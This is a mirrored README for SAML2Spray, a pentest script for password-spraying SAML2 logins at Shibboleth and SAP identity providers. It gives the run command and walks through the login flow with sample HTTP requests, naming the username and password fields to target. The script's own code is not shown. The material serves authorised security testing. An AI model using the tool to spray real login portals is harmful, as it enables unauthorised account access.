GithubHelp home page GithubHelp logo

saml2spray's Introduction

SAML2Spray

Python Script for SAML2 Authentication Passwordspraying against Sibboleth and SAP IDPs.

In a recent pentest I came accross the need to passwordspray a SAML2 authentication. As I couldn't find a ready to go solution, nor was able to do it with burp, I created my own little script to do the job for me.

TL/DR;

The script needs some tweaking to fit you current situation:

  • The URL for the service you want to access
  • The URL for the Identity Provider which the Service Provider will redirect you to
  • The values names that the Identity Provider is expecting when authenticating
    (everything can be read from the following explainations)

When ready run it with:

python3 saml2spray.py "path/to/userfile" "password"

You will get a colored response in the shell as well as a file containing all found matches of username:password

Following you'll find a short explaination of the workflow of a SAML2 authentication, which is:

  • User want's to access a service on site A
  • site A redirects to the identity provider on site B
  • User authenticates to site B which gives a SAML-Response and redirects the user to site A, granting access to the desired service by showing the SAML response

The long story - step by step

Here I will go into a little detail on how the actual process looks like and what you need to take notes and care of.

In order for the script to run, we need to fetch some things beforehand. Burp or alike can come in handy here.
I highly recommend you first do all the steps manually and check what is send from where to where, and was is expected at the according endpoints (headers, POST params and stuff).
Next I recommend to run the script through burp with proxychains, to see where you fucked up ;)

Initial request to the Service Provider at mysite.service:

GET / HTTP/1.1
Host: mysite.service
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
...

The response is a redirect to the Identity Provider at idp.mysite which will handle the authentication process

HTTP/1.1 302 Found
date: Thu, 03 Sep 2020 08:27:36 GMT
server: Apache
expires: Wed, 01 Jan 1997 12:00:00 GMT
cache-control: private,no-store,no-cache,max-age=0
location: https://idp.mysite/idp/profile/SAML2/Redirect/SSO?SAMLRequest=hZJdb4IwFIb...

and if followed will look something like so - which is the actual SAML request:

GET /idp/profile/SAML2/Redirect/SSO?SAMLRequest=hZJdb4IwFI...&RelayState=ss%3Am...&SigAlg=http%3A%2F%2Fwww.w3.org%2F2001%2F04%2Fxmldsig-more%23rsa-sha512&Signature=pBLfAUYBuNM... HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
...
Host: idp.mysite

Now we have to authenticate to the IDP with a username and password. This also is the point where you want to fetch the correct names to provide for username and
password and maybe certain other parameters that have to be provided in order for the login to succeed. In this case we have:
j_username
j_password
_eventId_proceed

POST /idp/profile/SAML2/Redirect/SSO?execution=e1s1 HTTP/1.1
Host: idp.mysite
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://idp.mysite/idp/profile/SAML2/Redirect/SSO?execution=e1s1
Content-Type: application/x-www-form-urlencoded
Content-Length: 59
Cookie: JSESSIONID=ABCDEFGHIJKLMNOP123456789
Connection: close
Upgrade-Insecure-Requests: 1

j_username=test%40test.de&j_password=test&_eventId_proceed=

If we provided wrong credentials we will most likely be redirected to a page for "wrong username/password".
But if we provided correct creds, we will get a SAML response which will then redirect us to the service we initially requested.
NOTE: In this scenario Shibboleth was used, but it should work with any SAML2 IDP.

HTTP/1.1 200 200
..
set-cookie: shib_idp_session=12345asdaw42qdasdasd; Domain=idp.mysite; Path=/; Secure; HttpOnly
..
form action="https://mysite.service/Shibboleth.sso/SAML2/POST" method="post"
input type="hidden" name="RelayState" value="ss:mem:f42430684asd3214325qasdfaysdasd"
input type="hidden" name="SAMLResponse" value="PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48c2Ftb
...

saml2spray's People

Contributors

luemmelsec avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.